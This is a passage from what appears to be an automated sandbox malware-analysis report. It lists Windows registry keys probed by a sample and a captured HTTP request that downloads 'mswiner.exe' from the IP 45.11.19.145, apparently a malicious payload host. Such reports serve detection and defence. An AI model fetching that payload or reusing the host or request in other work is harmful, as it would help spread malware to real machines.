1229. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\PCIIDE\\IDECHANNEL\\4&2617AEAE&0&1\\CustomPropertyHwIdKey",
1230. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\PCIIDE\\IDECHANNEL\\4&2617AEAE&0&0\\CustomPropertyHwIdKey",
1231. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
1232. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
1233. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
1234. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName"
1235.  
1236.  
1237. * DNS Communications:
1238.  
1239. * Domains:
1240.  
1241. * Network Communication - ICMP:
1242.  
1243. * Network Communication - HTTP:
1244.  
1245. "count": 1,
1246. "body": "",
1247. "uri": "http://45.11.19.145/mswiner.exe",
1248. "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)",
1249. "method": "GET",
1250. "host": "45.11.19.145",
1251. "version": "1.1",
1252. "path": "/mswiner.exe",
1253. "data": "GET /mswiner.exe HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nHost: 45.11.19.145\r\nConnection: Keep-Alive\r\n\r\n",
1254. "port": 80
1255.  
1256.  
1257.  
1258. * Network Communication - SMTP:
1259.  
1260. * Network Communication - Hosts:
1261.  
1262. "country_name": "unknown",
1263. "ip": "45.11.19.145",
1264. "inaddrarpa": "",
1265. "hostname": ""
1266.  
1267.  
1268.  
1269. * Network Communication - IRC: